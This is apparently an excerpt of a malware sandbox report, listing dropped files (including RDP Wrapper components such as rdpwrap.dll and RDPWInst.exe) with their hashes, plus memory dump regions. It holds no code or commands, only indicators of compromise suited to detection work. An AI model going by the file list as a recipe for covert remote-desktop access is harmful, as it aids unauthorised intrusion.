0ea8e2d6d7e1a5ff567070ae1173197bbd8ee6fd131e5d5492b9763769995843833fc08c433de5c0018bae626fd4e082e2640610c5c1d8e00163bc5f5bcc711d

Download Submit
C:\Windows\System32\catroot2\edb.log

Filesize
64KB

MD5
0abaaab645c3e4697374f9b3d87a422e

SHA1
ac6a09cf13b45ff3792b4bf22472b076b46c13ac

SHA256
119c47c4f4de90666b160661888deb54df4e5d03af70cbbbf0d8d09761a586c2

SHA512
25f981218b3d6682d83c57d362bef5251f271b64c1a231236670a3ee30cfe364da953545f4ff722762d26460a28d0b289592b4b19982e8b91a068618ec51e63c

Download Submit
C:\Windows\System32\null

Filesize
1KB

MD5
15371fd693f4586be853db5f098d8ec6

SHA1
8bc1275504d338980c0c19ab212273f436bdfa4f

SHA256
355f268f6abd785e78a73f844f69cf2030fffd2daaeaed002775c932a10b1159

SHA512
066da28c23627fc1d260662c9ba77a47edf9ee2901f0ce0509ca601e10155a09d83d93dfa28e4e9f8197234c5f8b216701d394d754d9698954910d5efbe5cb41

Download Submit
C:\Windows\System32\null

Filesize
1KB

MD5
023029770f9816c62870d8a101dfdf84

SHA1
9317ba79a366df8c405d319573d923845c9277b4

SHA256
d31159342fd7cff1423048dd5031f69f72d2a44aeda035a453dfc10eaa545236

SHA512
4a0912ef9881a8dce445ff47186eb2a3a82f2cf7a12405c872f36f82a136d138c38a838a1c50799633df124181c22fb8d4e4cd84d502927b4e350c4cc51af0de

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
115KB

MD5
3b18b58b5b9d32e1e8dc3d4f681227cd

SHA1
fd328b70f225a372903a3b36567779891f39dc32

SHA256
79173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf

SHA512
ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4

Download Submit
\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
memory/372-296-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/372-297-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/772-113-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1104-124-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1484-59-0x0000000000630000-0x0000000000824000-memory.dmp

Filesize
2.0MB

Download
memory/1484-57-0x0000000000630000-0x0000000000824000-memory.dmp

Filesize
2.0MB

Download
memory/1484-62-0x0000000000630000-0x0000000000824000-memory.dmp

Filesize
2.0MB

Download
memory/2016-239-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2108-269-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2108-270-0x0000000001C90000-0x0000000001C98000-memory.dmp

Filesize
32KB

Download
memory/2296-116-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2744-43-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/2744-45-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/2744-44-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2744-48-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/2852-52-0x0000000000080000-0x00000000000E7000-memory.dmp

Filesize
412KB

Download
memory/2852-55-0x0000000000080000-0x00000000000E7000-memory.dmp

Filesize
412KB

Download
memory/2852-50-0x0000000000080000-0x00000000000E7000-memory.dmp

Filesize
412KB

Download
memory/2992-234-0x0000000001540000-0x0000000001541000-memory.dmp

Filesize
4KB

Download
memory/2992-230-0x0000000000E10000-0x0000000000E11000-memory.dmp

Filesize
4KB

Download
memory/2992-221-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

Filesize
4KB

Download
memory/2992-219-0x0000000000E30000-0x0000000000E31000-memory.dmp

Filesize
4KB

Download
memory/2992-216-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/2992-209-0x0000000001030000-0x0000000001031000-memory.dmp

Filesize
4KB

Download
memory/2992-202-0x0000000000E50000-0x0000000000E51000-memory.dmp

Filesize
4KB

Download
memory/2992-200-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2992-182-0x0000000000BF0000-0x0000000000C00000-memory.dmp

Filesize
64KB

Download
memory/2992-187-0x0000000000CC0000-0x0000000000CD0000-memory.dmp

Filesize
64KB

Download